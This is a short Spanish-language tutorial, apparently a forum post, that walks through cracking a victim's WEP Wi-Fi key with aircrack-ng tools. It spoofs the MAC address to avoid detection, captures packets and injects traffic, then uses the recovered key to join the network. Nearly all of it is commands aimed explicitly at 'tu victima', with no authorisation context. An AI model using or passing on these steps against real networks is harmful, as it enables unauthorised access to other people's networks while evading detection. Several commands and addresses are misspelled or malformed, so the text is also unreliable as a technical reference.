Primero en una ventana shell tecleamos:
Ifconig (tu dispositivo inalambrico) down
Esto es para esconder tu tarjeta de red inalambrica para que no sea detectada.
Despues:
Macchanger –m 00:11:22:33:44:55 (tu dispositivo inalambrico) logico sin los parentesis
Esto e para cambiar la mascara de red para no ser detectado depues tecleamos esto para encender la tarjeta wireless con una nueva mascara
Ifconfig (tu dispositivo inalambrico) up
Ahora con Airodump tecleamos esto para que guarde todo las interacciones en una archivo llamado kyokorn con el canal 6 en – c significa canal
Airodump-ng –w kyokorn –c 6 (tu dispositivo inalambrico)
En esa ventana te sacara las redes que esta detectando tu tarjeta para que las puedas crackear, escoje la que tenga mas señal
Ejamplo 00:12:32:138:7U:29 y te dice el nombre de la conexion y el tipo de encriptacion que tiene. Apunta el numero y el nombre de la conexion de tu victima
Ahora con aireplay hacemos una asociacion con el A.P para poder inyectar trafico y tecleamos
aireplay-ng –l 0 -e (nombre de la conexion tal cual te sale en la anterior ventana) –a (el numero de tu victim) –h 00:!1:22:33:44:55 (tu dispositivo inalambrico)
Empezamos a inyectar trafico
aireplay-ng -3 –b (el numero de tu victim) –h 00:!1:22:33:44:55 (tu dispositivo inalambrico)
Esperamos un poco con unos 160000 ap
Usamos aircrack para extraer la clave
Aircrack-ng –c kyokorn-02.cap
Selecionamos a nuestra victima con el nuemero
Y voula ya tenemos la clave en unos segundos
Usamos iwconfig para poner una ip a nuestra tarjeta
Iwconfig -(tu dispositivo inalambrico) mode Manged key XX:XX:XX:XX:XX
Las XX son el numero que te salio con aircrack
Y con dhcpcd checamos nuestra ip
Esto lo hice con wifislax que es un sistema linux para seguridad de linux.